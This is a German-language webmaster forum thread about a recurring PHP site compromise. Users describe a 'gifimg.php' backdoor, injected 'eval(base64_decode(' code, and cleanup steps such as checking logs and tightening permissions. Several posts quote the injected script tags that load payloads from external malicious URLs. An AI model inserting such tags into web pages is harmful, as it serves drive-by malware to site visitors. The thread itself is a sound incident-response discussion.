Hi.
Hatten letztens einen Virenangriff auf unsere Seiten.
Welcher VMS Profi weiss, wie und in welcher Datei man sehen kann, wann der Angriff war?
Dann würde ich mir von meinem Hoster ein Backup von 1-2 Tage vorher holen. Dann müsste doch eigentlich wieder alles sauber sein, oder?
Wer kennt sich mit sochen Virenangriffen aus, oder hat auch in letzter Zeit sowas gehabt.
Ich klicke selbt auch und weiss, dass auch einige andere Seiten betroffen sein müssen
Kommt drauf an welcher "Virus". Welche Merkmale hat der denn?
Hatte in den letzten Tagen beim Kollegen auch mit einem PHP-Exploit zu kämpfen. Dort werden durch irgendeine Lücke im System unerlaubte Schad-scripts eingebunden, die beim Aufruf des Users dann ausgeführt werden.
Ursache könnten gestohlene FTP Daten sein. Aber auch nach mehrmaliger PW Änderungen taucht das Problem weiterhin auf.
Leider haben wir das bis jetzt auch noch nicht beheben können, im Moment hilft nur Backup alle 24 Stunden hochzuladen...
Kann aber soviel sagen dass dieser Virus wahrscheinlich nichts mit dem VMS und seinen Dateien an sich zu tun hat.
MFG
EDIT: speedklicker.de war die seite, ne? Dann hast du exakt den selben "Virus"...
YY Order!
Na ja, es tauchen im mehreren Dateien dubiose codes auf, wo niemand was mit anfangen kann. Es ist auch möglich dass diese nach dem entfernen wieder reproduziert werden und wieder drin sind. Die Folgen:
Von: User können nur noch sehr langsam klicken
Bis: Man kann sich nicht mehr einloggen
Virenprogramm bzw. Google gibt dann an, dass dies eine attakierende Webseite ist.
Darum wollte ich wissen, in welcher datei man sehen kann, von wann der erste Angriff war, damit man ein früheres backup einspielen kann
Auskunft geben die Access Logs, auch wenn ich da selber noch nichts aufschlussreiches gefunden hab, da Script ja beim normalen Aufruf ausgeführt wird von irgendeinem User der z.b. grad am Arthur spielt.
Die Lücke wird auch ausgenutzt durch eine Datei Namens "gifimg.php" die sich in die images Ordner von Scripten platziert und beim Aufruf nen Error 404 vortäuscht. In Wahrheit aber erlaubt die Datei, fremden PHP Code auszuführen.
Zudem baut sich dann in so ziemlich jedes Dokument welches index. oder config. heisst der Schadecode ein, welcher mit
beginnt.PHP-Code:eval(base64_decode(
YY Order!
Evtl wurde auch der FTP/SSH Zugang gehackt, bzw. via BruteForce das Passwort rausgefunden.
Dafür gibt es aber auch Logs, sprich der Hoster bzw. bei einem vServer/Server lässt sich das schon rausfinden.
Brute-Force Attacken bleiben nicht ungesehen, in dem Fall reicht es aber auch, Passwörter ändern, und alle Änderungen im Script rückgängig zu machen (und dann optional die Software gegen Brute-Force abzusichern).
Wenn es aber ein genereller Fehler im PHP-Script ist/war, dann bringt evtl. Rückgängig machen nicht viel, da derjenige dann morgen einfach die Lücke wieder ausnutzt.
Und aus den Access Logs bspw. SQL-Injections rauszulesen ist so nicht direkt möglich.
Da sollte mal jemand rüberschaun, der sich mit auskennt, man muss an sich nur alle dateien der Website in einem geeigneten Programm nach bestimmten Funktionsaufrufen, die potentiell gefährlich sind, durchsuchen lassen, und die dann alle im Kontext auf "Sicherheit" prüfen.
Evtl. mal allen Dateien die Rechte via FP entziehen, also nicht den Dateien, sondern dem User, der Gruppe und dem Rest der Welt.
Aber bitte nur machen, wenn man root Zugriff hat oder wen kennt, der das macht (Hoster).
Weil wenn nur noch "root" in die dateien schreiben darf (lese zugriff muss natürlich weiterhin bleiben), sollte der Angreifer weder per FTP noch durch eine Lücke im Script was ändern können.
Somit wäre die Gefahr vorerst gebannt, dann kann man langsam an die Fehlersuche rangehen (Problem wenn man Temporäre Daeien erstellen lässt/cache usw., aber man kann ja auch einzelne Ordner davon ausnehmen, und mal beobachetn, ob der da was reinschleusen kann. Zudem sollten das eh alles nur "nicht ausführbare dateien sein...)
Kill one man, and you are a murderer.
Kill millions of men, and you are a conqueror.
Kill them all, and you are a god. - Jean Rostand, Thoughts of a Biologist (1939)
Was mir zu dem Thema aufgefallen ist, das bei einigen Seiten ein Script direkt nach </head> eingebunden wurde:
</head><script src=http://cima-afrique.org/_private/style.php ></script>
(bloß nicht aufrufen bitte. Die ist echt Attakierend...)
der scheint bei einigen drin zu sein.
Noch schlimmer ist es, wenn ich die Seiten Betreiber dann anschreibe, denen genau sage was das Problem ist und die das noch nicht mal entfernen.....
Vielleicht hilft das ja weiter.
Beim Kollegen ist es dieses hier:
<script src=http://gnci-ict.com/images/cb6m/Thumbs.php ></script>
Die Adresse wechselt aber recht häufig.
Das baut sich dann in so ziemlich jedes .htm Dokument ein sowie in die ajax/global.ajax.js ganz unten.
Egal wie oft wir die infizierten Dateien schon von dem Code befreit haben (mitunter 150 betroffene Dateien), es kehrt immer wieder zurück.
YY Order!
hm, hört sich für mich nach ner namogopher.php an such mal nach ner Datei die so heisst, die pflanzt auch immer irgendwas in index.php und erstellt dazu ne .php in dem Bereich texte , sobald die was findet das mit 666 oder 777 Rechte versehen ist pflanzt die sich da rein
So etwas in der Art gab es vor ca 2 Jahren schon einmal, damals waren sämtliche Dateien betroffen deren Name index. enthielten.
War damals eine Sicherheitslücke in der Serversoftware die es ermöglichte Dateien zu verändern.
Nope, die Datei gibts bei ihm nicht, nur die gifimg.php im Ordner images, welche ebenfalls immer wieder zurückkehrt.
Hab grad im Klammforum noch was gelesen, die Seite milliarden-zocker.de scheint ebenfalls von sowas betroffen zu sein, dort ists diese Adresse:
<script src=http://kneipp-emden.de/monat/kita.php ></script>
Hab die Datei eben schon wieder löschen müssen.
YY Order!
Berechtigungen
Zitieren
